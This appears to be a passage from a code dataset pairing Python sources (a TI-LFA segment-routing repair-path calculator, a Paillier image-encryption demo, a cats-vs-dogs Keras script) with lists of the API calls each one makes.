:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(src, path[1]) for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
"""
Skip Q-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from P-node to dst:
"""
q_d_links = [
(path[idx], path[idx + 1])
for path in q_d_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in q_d_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting Q-space node {q_node} due "
f"to overlap:\n"
f"{q_d_links}\n"
f"{s_d_fh_links}"
)
continue
q_space.append(q_node)
return q_space
def gen_metric_link_tilfas(self, dst, graph, link_ep_space, link_pq_space, link_q_space, src):
"""
Return all link protecting TI-LFAs paths from src to dst.
Do this by returning all equal-cost explicit paths (based on metric,
not hop count) between "src" and "dst" nodes in "graph" that satisfy
the rules below.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_ep_space: EP- or P-space of Src node
:param list link_q_space: List of nodes in D's Q-space
:param list link_pq_space: List of nodes in D's Q-Space in post-SPF
:param str src: Source node name in "graph"
:return tilfa_paths: list of dict of TI-LFA paths
:rtype: list
"""
tilfa_paths = []
lfa_cost = 0
lfa_p_cost = 0
"""
TI-LFA Text:
5.1. FRR path using a direct neighbor
When a direct neighbor is in P(S,X) and Q(D,x) and on the post-
convergence path, the outgoing interface is set to that neighbor and
the repair segment list MUST be empty.
This is comparable to a post-convergence LFA FRR repair.
"""
for nei in graph.neighbors(src):
if nei in link_pq_space:
"""
Check that the neighbour/pq-node isn't reached via the same
failed fist hop link(s) toward dst:
"""
pre_s_pq_paths = self.spf.gen_metric_paths(dst=nei, graph=graph, src=src)
pre_s_pq_fh_links = [(src, path[1]) for path in pre_s_pq_paths]
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
overlap = [
fh_link for fh_link in pre_s_d_fh_links if fh_link in pre_s_pq_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping directly connected neighbour {nei} due "
f"to overlap:\n"
f"{pre_s_pq_fh_links},{nei}\n"
f"{pre_s_d_fh_links},{dst}"
)
continue
if self.debug > 1:
print(
f"Directly connected neighbour {nei} is link "
f"protecting from {src} to {dst}"
)
n_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=nei
)
cost = self.spf.gen_path_cost(graph, [src] + n_d_paths[0])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[[src, nei]],
n_d_paths,
[[]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.1.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
([[src, nei]], [n_d_path for n_d_path in n_d_paths], [[]])
)
if self.debug > 0:
print(f"TI-LFA 5.1.2: {tilfa_paths}")
"""
TI-LFA Text:
5.2. FRR path using a PQ node
When a remote node R is in P(S,X) and Q(D,x) and on the post-
convergence path, the repair list MUST be made of a single node
segment to R and the outgoing interface MUST be set to the outgoing
interface used to reach R.
This is comparable to a post-convergence RLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node not in graph.neighbors(src):
if p_node in link_pq_space:
if self.debug > 1:
print(
f"Remote P-node {p_node} is link protecting from "
f"from {src} to {dst}"
)
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
# Remove the pre-convergence the first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=tmp_g, src=src)
p_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=tmp_g, src=p_node
)
"""
Check if this path has a lower cost from src to dst
than the current TI-LFA path(s)
"""
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0] + p_d_paths[0][1:])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.1: {tilfa_paths}")
# If it has the same cost...
elif cost == lfa_cost:
"""
Check if this path is the same as an existing TI-LFA,
but using a different repair node along the same path.
Prefer scenario 1 over scenario 2...
Scenario 1: [ src -> R1 ] + [ R2 -> R3 -> dst ]
Scenario 2: [ src -> R1 -> R2 ] + [ R3 -> dst ]
This hopefully reduces the required segment stack and
thus reduces the MTU required and likelihood for
excessive MPLS label push operations.
"""
for tilfa in tilfa_paths:
if tilfa[0][-1] != post_s_p_paths[0][-1]:
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0])
this_lfa = self.spf.gen_path_cost(tmp_g, tilfa[0][0]) ########## Can any of the paths to p_node be different cost?
if cost < this_lfa:
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.2: {tilfa_paths}")
break
# Else it's an ECMP path with the same cost to p_node
else:
tilfa_paths.append (
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
)
if self.debug > 0:
print(f"TI-LFA 5.2.3: {tilfa_paths}")
"""
TI-LFA Text:
5.3. FRR path using a P node and Q node that are adjacent
When a node P is in P(S,X) and a node Q is in Q(D,x) and both are on
the post-convergence path and both are adjacent to each other, the
repair list MUST be made of two segments: A node segment to P (to be
processed first), followed by an adjacency segment from P to Q.
This is comparable to a post-convergence DLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node in link_ep_space:
if p_node not in link_pq_space:
for q_node in graph.neighbors(p_node):
if q_node == src or q_node == dst:
continue
if q_node in link_q_space:
if self.debug > 1:
print(
f"P-Node {p_node} is neighbour of "
f"{q_node}, which together are link "
f"protecting from {src} to {dst}"
)
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
q_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=q_node
)
cost = self.spf.gen_path_cost(
graph, [s_p_paths[0] + q_d_paths[0][1:]]
)
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.3.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.3.2: {tilfa_paths}")
"""
5.4. Connecting distant P and Q nodes along post-convergence paths
In some cases, there is no adjacent P and Q node along the post-
convergence path. However, the PLR can perform additional
computations to compute a list of segments that represent a loop-free
path from P to Q. How these computations are done is out of scope of
this document.
---
Thanks you bastards. We shall calculate any P to Q paths. If some
exist, calculate the Source to P paths, then append them together.
"""
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
# Remove the pre-convergence the first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
"""
For each ep node calculate the post convergence path to each pq node.
Build a list of all these paths to get the lowest cost one.
"""
ep_nodes = [node for node in link_ep_space if node not in link_pq_space]
pq_nodes = [node for node in link_pq_space if node not in link_ep_space]
p_q_paths = []
p_q_cost = 0
for ep in ep_nodes:
for pq in pq_nodes:
post_p_q_paths = self.spf.gen_metric_paths(dst=pq, graph=tmp_g, src=ep)
if len(post_p_q_paths[0]) > 0:
for path in post_p_q_paths:
cost = self.spf.gen_path_cost(tmp_g, path)
if cost < p_q_cost or p_q_cost == 0:
p_q_paths = [path]
p_q_cost = cost
elif cost == p_q_cost:
if path not in p_q_paths:
p_q_paths.append(path)
if p_q_paths:
# If we found p to q paths, append them to s to p paths
s_q_paths = []
for p_q_path in p_q_paths:
p = p_q_path[0]
s_p_paths = self.spf.gen_metric_paths(dst=p, graph=tmp_g, src=src)
for s_p_path in s_p_paths:
s_q_paths.append(s_p_path + p_q_path[1:])
for s_q_path in s_q_paths:
cost = self.spf.gen_path_cost(tmp_g, s_q_path)
if cost < lfa_cost or lfa_cost == 0:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
lfa_cost = cost
tilfa_paths = [
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.4.1: {tilfa_paths}")
elif cost == lfa_cost:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
tilfa_paths.append(
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.4.2: {tilfa_paths}")
return tilfa_paths
def gen_metric_node_tilfas(self, dst, graph, node_ep_space, node_pq_space, src):
"""
Return all node protecting rLFAs.
Do this by filtering the list of link rLFAs "tilfas_link" for those
with pre-convergence best path(s) from all repair tunnel end-points
{p}, which don't pass through any of the first-hops of any of the
pre-convergence best-paths from src to dst.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list tilfas_link: list of link protecting rLFA paths in "graph"
:param str src: Source node name in "graph"
:return tilfas_node: List of tuples of equal-cost node protecting TI-LFAs to dst
:rtype: list
"""
tilfas_node = []
return tilfas_node
def gen_metric_paths(self, dst, graph, src):
"""
Return all TI-LFA paths between the "src" and "dst" nodes in "graph",
based on link metric (not hop count), which provide link and node
protection. Returned are all TI-LFA paths in a dict, keyed by type (link
or node), the key values are lists of tuples containing the path to
the P node and path from P to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node name in "graph"
:return tilfa_paths: Dict with list(s) of tuples
:rtype: list
"""
tilfas = {}
if self.debug > 0:
print(f"Calculating TI-LFA paths from {src} to {dst}")
tilfas = {
"tilfas_link": [],
"tilfas_node": []
}
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
# There are no paths between this src,dst pair
if not s_d_paths:
return tilfas
"""
TI-LFA Text:
5. TI-LFA Repair path
The TI-LFA repair path (RP) consists of an outgoing interface and a
list of segments (repair list (RL)) to insert on the SR header. The
repair list encodes the explicit post-convergence path to the
destination, which avoids the protected resource X and, at the same
time, is guaranteed to be loop-free irrespective of the state of FIBs
along the nodes belonging to the explicit path.
The TI-LFA repair path is found by intersecting P(S,X) and Q(D,X)
with the post-convergence path to D and computing the explicit SR-
based path EP(P, Q) from P to Q when these nodes are not adjacent
along the post convergence path. The TI-LFA repair list is expressed
generally as (Node_SID(P), EP(P, Q)).
"""
if self.ep_space:
link_ep_space = self.gen_ep_space(dst, "link", graph, src)
node_ep_space = self.gen_ep_space(dst, "node", graph, src)
if self.debug > 0:
print(f"link_ep_space: {link_ep_space}")
print(f"node_ep_space: {node_ep_space}")
else:
link_p_space = self.gen_link_p_space(dst, graph, src)
node_p_space = self.gen_node_p_space(dst, graph, src)
if self.debug > 0:
print(f"link_p_space: {link_p_space}")
print(f"node_p_space: {node_p_space}")
link_q_space = self.gen_link_q_space(dst, graph, src)
node_q_space = self.gen_node_q_space(dst, graph, src)
if self.debug > 0:
print(f"link_q_space: {link_q_space}")
print(f"node_q_space: {node_q_space}")
link_pq_space = self.gen_link_pq_space(dst, graph, link_q_space, src)
node_pq_space = self.gen_node_pq_space(dst, graph, node_q_space, src)
if self.debug > 0:
print(f"link_pq_space: {link_pq_space}")
print(f"node_pq_space: {node_pq_space}")
if self.ep_space:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_ep_space, link_pq_space, link_q_space, src)
else:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_p_space, link_pq_space, link_q_space, src)
if self.debug > 0:
print(f"link_tilfas: {link_tilfas}")
tilfas["tilfas_link"] = link_tilfas
return tilfas
############################
if self.ep_space:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_ep_space, node_pq_space, src)
else:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_p_space, node_pq_space, src)
if self.debug > 0:
print(f"node_tilfas: {node_tilfas}")
tilfas["tilfas_node"] = node_tilfas
return tilfas
def gen_node_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
nodes(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid F node to Dst
:return p_space: List of nodes in src's P-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for node protecting P-space nodes of {src} not via "
f"first-hop(s): {s_d_fhs}"
)
p_space = []
for p_node in graph.nodes:
# Exclude nodes which are a first-hop towards dst:
if p_node == src or p_node == dst:
continue
if p_node in s_d_fhs:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node} "
f"because it is a first-hop(s) towards {dst}: "
f"{s_d_fhs}"
)
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Check if any of the p_node->dst path(s) contain any of the
first-hop(s) from src->dst, those are the nodes we want to avoid.
"""
overlap = [
fh for fh in s_d_fhs for s_p_path in s_p_paths if fh in s_p_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node}, "
f"path(s) from {src} to {p_node} overlap with "
f"first-hop(s) in path(s) from {src} to {dst}: "
f"{s_p_paths}"
)
continue
p_space.append(p_node)
return p_space
def gen_node_pq_space(self, dst, graph, node_q_space, src):
"""
Return the list of Q-space nodes which are node protecting against F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list node_q_space: List of Q-space nodes in "graph" relative to
D not via F
:param str src: Source node name in "graph"
:return node_pq_space: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.4. Q-Space property computation for a node F, over post-convergence
paths
We want to determine which nodes on the post-convergence from the PLR
to the destination D are in the Q-Space of destination D w.r.t. node
F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of F, with Q(D, F).
"""
node_pq_space = []
# Get the pre-converge path(s) to D and remove the first-hop node(s)
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_nodes = [path[1] for path in pre_s_d_paths]
# There are no node protecting paths for a directly connected neighbour
for fh_node in pre_s_d_fh_nodes:
if fh_node in graph.neighbors(src):
return node_pq_space
tmp_g = graph.copy()
for fh_node in pre_s_d_fh_nodes:
tmp_g.remove_node(fh_node)
# Recalculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in node_q_space:
if q_node in post_s_d_path:
node_pq_space.append(q_node)
return node_pq_space
def gen_node_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid node(s) F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to F node
:return q_space: List of nodes in dst's Q-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
overlap = [
s_d_fh for s_d_fh in s_d_fhs for q_d_path in q_d_paths if s_d_fh in q_d_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting Q-Space node {q_node}, "
f"path to {dst} overlaps with hop(s) in path(s) from "
f"{src} toward {dst}: {q_d_paths}"
)
continue
q_space.append(q_node)
return q_space
def init_topo(self, graph, topo):
"""
Create empty dict keys for all possible paths this class can generate
:return None:
:rtype: None
"""
for src in graph.nodes:
for dst in graph.nodes:
if src == dst:
continue
for path_type in self.path_types:
if path_type not in topo[src][dst]:
topo[src][dst][path_type] = []
def paths_adj_sids(self, graph, paths):
"""
Return lists of adj SIDs that will steer along the explicit path
:param networkx.Graph graph: NetworkX graph object
:param list paths: List of list of nodes that form the explicit path(s)
:return adj_sids: List of adj SIDs along path
:rtype: list of lists
"""
adj_sids = []
for path in paths:
sids = []
for idx, node in enumerate(path):
if idx < (len(path) - 1):
sids.append(graph.edges[(node, path[idx + 1])]["adj_sid"])
adj_sids.append(sids)
if self.debug > 1:
print(f"path_adj_sids: {adj_sids}")
return adj_sids
|
[
"os.path.join",
"diagram.Diagram",
"spf.spf"
] |
[((643, 659), 'diagram.Diagram', 'Diagram', ([], {'debug': '(2)'}), '(debug=2)\n', (650, 659), False, 'from diagram import Diagram\n'), ((769, 790), 'spf.spf', 'spf', ([], {'debug': 'self.debug'}), '(debug=self.debug)\n', (772, 790), False, 'from spf import spf\n'), ((5838, 5874), 'os.path.join', 'os.path.join', (['outdir', 'src', 'path_type'], {}), '(outdir, src, path_type)\n', (5850, 5874), False, 'import os\n')]
|
from __future__ import print_function
import logging
import traceback
import sys
logger = logging.getLogger(__name__)
class NoSuchModule(object):
def __init__(self, name):
self.__name = name
self.__traceback_str = traceback.format_tb(sys.exc_info()[2])
errtype, value = sys.exc_info()[:2]
self.__exception = errtype(value)
def __getattr__(self, item):
raise self.__exception
try:
import z5py
except ImportError:
z5py = NoSuchModule('z5py')
|
[
"logging.getLogger",
"sys.exc_info"
] |
[((92, 119), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (109, 119), False, 'import logging\n'), ((302, 316), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (314, 316), False, 'import sys\n'), ((258, 272), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (270, 272), False, 'import sys\n')]
|
import numpy as np
from PIL import Image
from paillier import *
import sys
from matplotlib import pyplot as plt
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class main:
def __main__(self):
self.imagepath = None
self.c_image = None
self.image = None
self.is_image_loaded = False
self.is_encrypted = False
self.pail = paillier()
self.priv, self.pub = self.pail.generate_keypair(20)
def start(self):
pass
def nothing():
pail = paillier()
image = pail.open_image('simple.png')
priv, pub = pail.generate_keypair(20)
c_image = pail.encrypt_image(pub,image)
#c_image = pail.multiply_by_const(pub, c_image, 2)
#c_image = pail.swap_colors(pub, c_image, 'red', 'green')
#c_image = pail.flip_image(pub, c_image)
#c_image = pail.mirroring_image(pub, c_image)
#p_image = pail.increase_color(pub, c_image, "red", 100)
#c_image = pail.brightness(pub,c_image, 40)
d_image = pail.decrypt_image(priv, pub, c_image)
pail.save_image(d_image)
if __name__ == '__main__':
pail = paillier()
original = pail.open_image(sys.argv[1])
priv, pub = pail.generate_keypair(20)
c_image = pail.encrypt_image(pub, original)
print("Enter help for options..")
while(True):
a = input(bcolors.OKCYAN+"(paillier)#> "+bcolors.ENDC)
try:
inputs = a.strip().split()
if(inputs[0] == 'brightness'):
c_image = pail.brightness(pub,c_image, int(inputs[1]))
elif(inputs[0] == 'color'):
c_image = pail.increase_color(pub, c_image, inputs[1], int(inputs[2]))
elif(inputs[0] == 'mirror'):
c_image = pail.mirroring_image(pub, c_image)
elif(inputs[0] == 'flip'):
c_image = pail.flip_image(pub, c_image)
elif(inputs[0] == 'swap'):
c_image = pail.swap_colors(pub, c_image, inputs[1] , inputs[2] )
elif(inputs[0] == 'multiply'):
c_image = pail.multiply_by_const(pub, c_image, 2)
elif(inputs[0] == 'print'):
print(c_image)
elif(inputs[0] == 'show'):
fig = plt.figure(figsize=(10, 7))
fig.add_subplot(1, 2, 1)
if(len(original.shape) == 2):
plt.imshow(original, cmap='gray')
else:
plt.imshow(original)
plt.axis('off')
plt.title("Original")
result = pail.decrypt_image(priv, pub, c_image)
fig.add_subplot(1, 2, 2)
if(len(result.shape) == 2):
plt.imshow(result, cmap='gray')
else:
plt.imshow(result)
plt.axis('off')
plt.title("Result")
plt.show()
elif(inputs[0] == 'keys'):
print(bcolors.OKGREEN+"{} {}".format(pub,priv)+bcolors.ENDC)
elif(inputs[0] == 'help'):
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
else:
print("Wrong input...")
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
except:
print("Wrong input...")
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.figure"
] |
[((2081, 2108), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (2091, 2108), True, 'from matplotlib import pyplot as plt\n'), ((2256, 2271), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (2264, 2271), True, 'from matplotlib import pyplot as plt\n'), ((2276, 2297), 'matplotlib.pyplot.title', 'plt.title', (['"""Original"""'], {}), "('Original')\n", (2285, 2297), True, 'from matplotlib import pyplot as plt\n'), ((2492, 2507), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (2500, 2507), True, 'from matplotlib import pyplot as plt\n'), ((2512, 2531), 'matplotlib.pyplot.title', 'plt.title', (['"""Result"""'], {}), "('Result')\n", (2521, 2531), True, 'from matplotlib import pyplot as plt\n'), ((2539, 2549), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2547, 2549), True, 'from matplotlib import pyplot as plt\n'), ((2182, 2215), 'matplotlib.pyplot.imshow', 'plt.imshow', (['original'], {'cmap': '"""gray"""'}), "(original, cmap='gray')\n", (2192, 2215), True, 'from matplotlib import pyplot as plt\n'), ((2231, 2251), 'matplotlib.pyplot.imshow', 'plt.imshow', (['original'], {}), '(original)\n', (2241, 2251), True, 'from matplotlib import pyplot as plt\n'), ((2422, 2453), 'matplotlib.pyplot.imshow', 'plt.imshow', (['result'], {'cmap': '"""gray"""'}), "(result, cmap='gray')\n", (2432, 2453), True, 'from matplotlib import pyplot as plt\n'), ((2469, 2487), 'matplotlib.pyplot.imshow', 'plt.imshow', (['result'], {}), '(result)\n', (2479, 2487), True, 'from matplotlib import pyplot as plt\n')]
|
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python import keras
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
from tensorflow.python.keras.layers import Input, Dense
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import LeakyReLU
#from tensorflow.python.framework import ops
base_dir = '/home/anoop/Downloads/dogs-vs-cats'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
# Directory with our training cat/dog pictures
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
# Directory with our validation cat/dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
train_cat_fnames = os.listdir( train_cats_dir )
train_dog_fnames = os.listdir( train_dogs_dir )
print(train_cat_fnames[:10])
print(train_dog_fnames[:10])
print('total training cat images :', len(os.listdir( train_cats_dir ) ))
print('total training dog images :', len(os.listdir( train_dogs_dir ) ))
print('total validation cat images :', len(os.listdir( validation_cats_dir ) ))
print('total validation dog images :', len(os.listdir( validation_dogs_dir ) ))
#/* %matplotlib inline
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
pic_index = 0 # Index for iterating over images
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols*4, nrows*4)
pic_index+=8
next_cat_pix = [os.path.join(train_cats_dir, fname)
for fname in train_cat_fnames[ pic_index-8:pic_index]
]
next_dog_pix = [os.path.join(train_dogs_dir, fname)
for fname in train_dog_fnames[ pic_index-8:pic_index]
]
for i, img_path in enumerate(next_cat_pix+next_dog_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
# plt.imshow(img)
#plt.show()
train_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size = (150,150),
batch_size = 20,
class_mode = 'binary'
)
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 150x150 with 3 bytes color
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150, 150, 3)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
# Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('cats') and 1 for the other ('dogs')
tf.keras.layers.Dense(1, activation='sigmoid')
])
|
[
"matplotlib.pyplot.subplot",
"tensorflow.python.keras.preprocessing.image.ImageDataGenerator",
"matplotlib.image.imread",
"tensorflow.keras.layers.Conv2D",
"tensorflow.keras.layers.MaxPooling2D",
"tensorflow.keras.layers.Dense",
"matplotlib.pyplot.gcf",
"os.path.join",
"os.listdir",
"tensorflow.keras.layers.Flatten"
] |
[((694, 725), 'os.path.join', 'os.path.join', (['base_dir', '"""train"""'], {}), "(base_dir, 'train')\n", (706, 725), False, 'import os\n'), ((743, 779), 'os.path.join', 'os.path.join', (['base_dir', '"""validation"""'], {}), "(base_dir, 'validation')\n", (755, 779), False, 'import os\n'), ((845, 876), 'os.path.join', 'os.path.join', (['train_dir', '"""cats"""'], {}), "(train_dir, 'cats')\n", (857, 876), False, 'import os\n'), ((894, 925), 'os.path.join', 'os.path.join', (['train_dir', '"""dogs"""'], {}), "(train_dir, 'dogs')\n", (906, 925), False, 'import os\n'), ((998, 1034), 'os.path.join', 'os.path.join', (['validation_dir', '"""cats"""'], {}), "(validation_dir, 'cats')\n", (1010, 1034), False, 'import os\n'), ((1057, 1093), 'os.path.join', 'os.path.join', (['validation_dir', '"""dogs"""'], {}), "(validation_dir, 'dogs')\n", (1069, 1093), False, 'import os\n'), ((1114, 1140), 'os.listdir', 'os.listdir', (['train_cats_dir'], {}), '(train_cats_dir)\n', (1124, 1140), False, 'import os\n'), ((1162, 1188), 'os.listdir', 'os.listdir', (['train_dogs_dir'], {}), '(train_dogs_dir)\n', (1172, 1188), False, 'import os\n'), ((1796, 1805), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (1803, 1805), True, 'import matplotlib.pyplot as plt\n'), ((2421, 2458), 'tensorflow.python.keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'rescale': '(1.0 / 255)'}), '(rescale=1.0 / 255)\n', (2439, 2458), False, 'from tensorflow.python.keras.preprocessing.image import ImageDataGenerator\n'), ((1875, 1910), 'os.path.join', 'os.path.join', (['train_cats_dir', 'fname'], {}), '(train_cats_dir, fname)\n', (1887, 1910), False, 'import os\n'), ((2017, 2052), 'os.path.join', 'os.path.join', (['train_dogs_dir', 'fname'], {}), 